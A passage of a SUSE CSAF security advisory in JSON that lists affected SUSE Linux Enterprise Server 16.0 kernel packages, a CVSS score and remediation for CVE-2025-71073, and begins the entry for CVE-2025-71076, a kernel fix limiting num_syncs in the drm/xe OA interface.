"summary": "SUSE Bug 1256632 for CVE-2025-71073",
"url": "https://bugzilla.suse.com/1256632"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71073"
},
{
"cve": "CVE-2025-71076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
